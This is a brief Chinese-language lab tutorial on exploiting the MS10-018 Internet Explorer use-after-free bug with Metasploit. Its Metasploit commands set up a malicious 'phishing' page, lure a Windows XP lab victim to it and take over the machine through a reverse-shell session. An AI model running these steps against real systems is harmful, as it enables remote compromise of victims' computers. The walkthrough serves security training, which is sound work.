MSF-MS10-018漏洞利用

目录

漏洞简介

漏洞利用

漏洞简介

漏洞影响版本：MS10-018 漏洞（CNNVD-201003-002）是 IE 在执行 JavaScript 时存在的一个未知错误，利用该漏洞能够远程执行任意代码。此漏洞影响到 Windows 2000、XP、Server 2003、Vista 等操作系统上安装的 IE 6 和 IE 7。
漏洞原理简介：MS10-018 是 IE 浏览器的 “释放后重用” 内存漏洞。IE 处理特定网页元素时，会错误引用已释放的内存区域，攻击者可通过构造恶意网页，利用此缺陷执行任意代码，受害者仅需用受影响的 IE（6/7）访问该网页即可被攻击。
环境部署： 攻击机：Linux 系统（Kali）
受害机：Windows XP sp3 IE 6 浏览器的靶机
同样要求靶机关闭防火墙，

两台机器可以互通网络：

利用工具： Metasploit

漏洞利用

进入msf控制台：
msfconsole
搜索攻击模块：
search ms10-018
利用攻击模块：

use 1  

设置必要参数：

set srvhost 192.168.111.130 # 设置钓鱼地址
set uripath look_at_here # 设置钓鱼路径

设置好之后run：
run / exploit # 都可
通过受害机反弹shell：

浏览器访问： http://192.168.111.130:8080/look_at_here
通过会话拿下机器：

sessions -l
sessions -i 1
后面对系统的进一步操作就类似了。